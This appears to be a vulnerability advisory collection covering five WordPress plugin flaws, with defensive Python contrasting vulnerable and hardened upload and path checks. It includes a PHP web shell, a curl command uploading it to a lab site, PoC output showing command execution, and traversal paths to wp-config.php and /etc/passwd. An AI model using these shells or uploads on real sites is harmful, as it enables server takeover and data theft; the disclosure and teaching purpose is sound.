CVE-2025-12399

The WordPress Alex Reservations plugin (versions 2.2.3 and prior) contains an arbitrary file upload vulnerability that allows authenticated WordPress administrators to upload malicious PHP files to the server, potentially leading to remote code execution.

TL;DR Exploits

A PoC, CVE-2025-12399.py, is provided to demonstrate an authenticated administrator uploading shell.php and executing commands on the server:

python3 ./CVE-2025-12399.py https://TARGETSITE.com admin "$PASSWORD"
[+] Target: http://TARGETSITE.com
[+] Username: admin
[+] Nonce obtained: 022b25d0a5
[+] File uploaded successfully!
[+] Shell URL: https://TARGETSITE.com/wp-content/uploads/alex-reservations/2025/10/shell.php
[+] Command output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Technical Description

The vulnerability exists in UploadFileController.php, which backs the /wp-json/srr/v1/app/upload/file REST endpoint. The upload handler performs no file-type validation: it only runs the supplied filename through a basic regex to strip unwanted characters, and that regex places no restriction on the extension. An authenticated WordPress administrator can therefore upload arbitrary files, including PHP files, which the web server then executes from the uploads directory.

CVE-2025-9216

The StoreEngine plugin contains a vulnerability in its CSV Import/Export feature that allows any authenticated user (subscriber, author, editor, etc.) to upload arbitrary files and gain remote code execution. Two flaws combine: (1) the CSV import endpoint performs no file validation and no permission (capability) check, relying on nonce verification alone, and (2) the storeengine_nonce is exposed to all front-end users through the plugin's JavaScript. A WordPress nonce only ties a request to the plugin's own pages; it is not an authorization check. Any authenticated user can therefore extract the nonce from a front-end page and use it to upload a PHP web shell via the storeengine_csv/import endpoint, giving subscriber+ users the ability to execute arbitrary code on the server.
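Both the Alex Reservations upload handler and the StoreEngine CSV import accept a file on the strength of its name alone. The following is an added illustration, not code from either plugin: it models filename-only sanitization next to a check that validates the final extension against an allowlist and the content against the type the extension claims. The regex, the allowlist, the magic-byte table and the sample inputs are assumptions constructed for the example.

```python
import re

# Assumed allowlist for this example; neither plugin's real list is on the page.
ALLOWED_EXTENSIONS = {"csv", "png", "jpg", "jpeg", "gif", "pdf"}

# Extensions a web server may hand to the PHP interpreter; a filename containing
# one of these anywhere (shell.php.png) is refused outright.
EXECUTABLE_SEGMENTS = {"php", "phtml", "php3", "php5", "phar"}

# Leading bytes each binary type must start with. Text types (csv) are instead
# checked for the absence of a PHP open tag.
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}


def sanitize_filename_only(name: str) -> str:
    """Model of the vulnerable approach: drop characters the regex dislikes and
    nothing else. The pattern is an assumption, not the plugin's own regex.
    Note that 'shell.php' passes through completely unchanged."""
    return re.sub(r"[^A-Za-z0-9._-]", "", name)


def vulnerable_accepts(name: str, data: bytes) -> bool:
    """Accepts any non-empty sanitized name; extension and content are ignored."""
    return bool(sanitize_filename_only(name))


def hardened_accepts(name: str, data: bytes) -> bool:
    """Accept only when the final extension is allowlisted, no executable
    segment appears in the name, and the content matches the claimed type."""
    name = sanitize_filename_only(name)
    # Dotfiles such as .htaccess can change how the upload directory is served.
    if not name or name.startswith("."):
        return False
    parts = name.lower().split(".")
    if len(parts) < 2:
        return False
    ext = parts[-1]
    if ext not in ALLOWED_EXTENSIONS:
        return False
    if any(seg in EXECUTABLE_SEGMENTS for seg in parts[:-1]):
        return False
    if ext in MAGIC:
        return data.startswith(MAGIC[ext])
    # Plain-text type: refuse anything carrying a PHP open tag.
    return b"<?" not in data


# Constructed sample inputs.
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
CSV_ROWS = b"id,name\n1,alice\n"
```

The vulnerable model lets shell.php through untouched; the hardened check refuses it, refuses shell.phtml and shell.php.png, and also refuses a correctly named image or CSV whose bytes are really PHP.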

CVE-2025-9215

The StoreEngine plugin contains a vulnerability in its CSV Import/Export feature that allows any authenticated user (subscriber, author, editor, etc.) to download arbitrary files from the server, including sensitive system files, the WordPress configuration file, and plugin source code. The storeengine_csv/file_download endpoint does not sanitize the requested path and relies on nonce verification alone, while the storeengine_nonce is exposed to all front-end users through the plugin's JavaScript. Note: this vulnerability requires the CSV Import/Export addon to be enabled by an administrator. Once it is enabled, any authenticated user can extract the nonce from a front-end page and use it to read any file on the server via path traversal, giving subscriber+ users access to sensitive system and application files.
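The missing path sanitization is the whole bug: a requested name is joined onto the export directory and served. The following is an added example, not StoreEngine code, that models the unsafe join beside a containment check which normalizes the joined path and refuses anything that resolves outside the base directory. The export directory path is an assumption for the example.

```python
import os

# Assumed export directory; the plugin's real location is not given on the page.
EXPORT_DIR = "/var/www/html/wp-content/uploads/storeengine-exports"


def vulnerable_resolve(base: str, requested: str) -> str:
    """Model of the flaw: the requested name is joined onto the base directory
    with no normalization or containment check, so '../' walks out of it and
    an absolute path discards the base entirely."""
    return os.path.join(base, requested)


def safe_resolve(base: str, requested: str):
    """Return the absolute path inside `base` for `requested`, or None if the
    request would escape it (traversal, absolute path, NUL byte, or the base
    directory itself)."""
    if not requested or "\x00" in requested:
        return None
    base_real = os.path.realpath(base)
    # os.path.join drops `base` when `requested` is absolute; normalizing the
    # joined result catches that case as well as '../' sequences.
    candidate = os.path.realpath(os.path.join(base_real, requested))
    try:
        inside = os.path.commonpath([base_real, candidate]) == base_real
    except ValueError:
        inside = False
    if not inside or candidate == base_real:
        return None
    return candidate
```

The vulnerable join turns `../../../wp-config.php` into `/var/www/html/wp-config.php`; the safe variant returns None for it, for `/etc/passwd`, and for the export directory itself, while still serving `orders.csv` from inside the directory.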

CVE-2025-6085

The Make Connector plugin does not validate the file type of files uploaded through its REST API media endpoint (/wp-json/wp/v2/media, authenticated with the plugin's IWC-API-KEY header), allowing administrators or above to upload arbitrary files, including PHP, and potentially gain code execution on the server.

TL;DR Exploits

cat << 'EOF' > shello.php
<?php
    // Silence is golden
    if (!empty($_GET['cmd'])) {
        echo "<pre>".shell_exec($_GET["cmd"])."</pre>";
    }
?>
EOF

curl -k -X POST https://lab1.hacker/wp-json/wp/v2/media \
  -H "IWC-API-KEY: YOURFRIENDLYKEYHERE" \
  -F "file=@shello.php" \
  -F "title=Hacker World" \
  -F "description=A test file" \
  -F "caption=Hacker Caption"

Leveraging the shell once it’s in the uploads folder:

CVE-2025-23968

The AI Bud plugin exposes a REST API endpoint, /wp-json/ai-buddy/v1/wp/attachments, that uploads files to the WordPress media library. The endpoint validates the file type first and only afterwards applies a caller-controlled rename, so the attacker can rename the already-validated upload to any extension (including .php). This allows administrators or above to upload arbitrary files and potentially gain code execution on the server.
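The ordering is what matters here: the check runs against the name the client uploaded, not the name that ends up on disk. The following is an added example, not AI Bud code, that models a store-then-rename handler beside one that computes the final name before validating anything. The allowlist, the scratch directory and the sample payload are assumptions constructed for the example.

```python
import os
import tempfile

# Assumed allowlist for the example.
ALLOWED = {"png", "jpg", "jpeg", "gif", "pdf"}

# Constructed sample payload.
SHELL = b"<?php system($_GET['cmd']); ?>"


def extension_allowed(filename: str) -> bool:
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in ALLOWED


def vulnerable_store(media_dir: str, upload_name: str, data: bytes, rename_to=None) -> str:
    """Validate the uploaded name, write the file, then honour the rename.
    Because the rename runs after validation, rename_to='shell.php' turns an
    accepted image upload into a PHP file on disk."""
    if not extension_allowed(upload_name):
        raise ValueError("rejected: " + upload_name)
    path = os.path.join(media_dir, os.path.basename(upload_name))
    with open(path, "wb") as fh:
        fh.write(data)
    if rename_to:
        new_path = os.path.join(media_dir, os.path.basename(rename_to))
        os.replace(path, new_path)
        path = new_path
    return path


def fixed_store(media_dir: str, upload_name: str, data: bytes, rename_to=None) -> str:
    """Compute the final name first and validate that; nothing touches disk
    until the name that will actually exist has passed the check."""
    final_name = os.path.basename(rename_to or upload_name)
    if not extension_allowed(final_name):
        raise ValueError("rejected: " + final_name)
    path = os.path.join(media_dir, final_name)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def demo() -> dict:
    """Run both handlers in a scratch directory and report what landed on disk."""
    media_dir = tempfile.mkdtemp(prefix="attachments-demo-")
    results = {}
    written = vulnerable_store(media_dir, "pic.png", SHELL, rename_to="shell.php")
    results["vulnerable_wrote"] = os.path.basename(written)
    try:
        fixed_store(media_dir, "pic.png", SHELL, rename_to="shell.php")
        results["fixed_wrote"] = "shell.php"
    except ValueError:
        results["fixed_wrote"] = None
    results["on_disk"] = sorted(os.listdir(media_dir))
    return results
```

Running demo() shows the vulnerable handler leaving shell.php in the media directory while the fixed handler refuses the request, because the only name it ever validates is the one it is about to write.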

TL;DR Exploits

A PoC, cve-2025-23968.py, is provided to demonstrate an administrator uploading a web shell named shell.php.